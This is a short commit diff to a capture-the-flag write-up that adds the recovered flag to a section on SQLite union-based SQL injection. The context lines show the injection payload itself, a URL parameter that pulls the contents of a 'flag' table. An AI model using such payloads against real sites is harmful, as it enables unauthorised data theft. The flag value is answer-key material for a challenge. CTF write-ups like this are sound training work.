feat: add a missing flag

This commit is contained in:
Nemo D'ACREMONT 2025-10-18 18:25:23 +02:00
parent 91b910077d
commit 3912c48a97
No known key found for this signature in database

View File

@ -71,7 +71,7 @@ There are 3 tables : 'events', 'flag' and 'users'.
We finally get the flag with the following request : We finally get the flag with the following request :
`http://[REDACTED]/?MONTH=02' union select "a", * from flag WHERE '-01'='` `http://[REDACTED]/?MONTH=02' union select "a", * from flag WHERE '-01'='`
Flag: I didn't keep it :/ Flag: `flag{sqlite_union_based_injection_success}`
### Store ### Store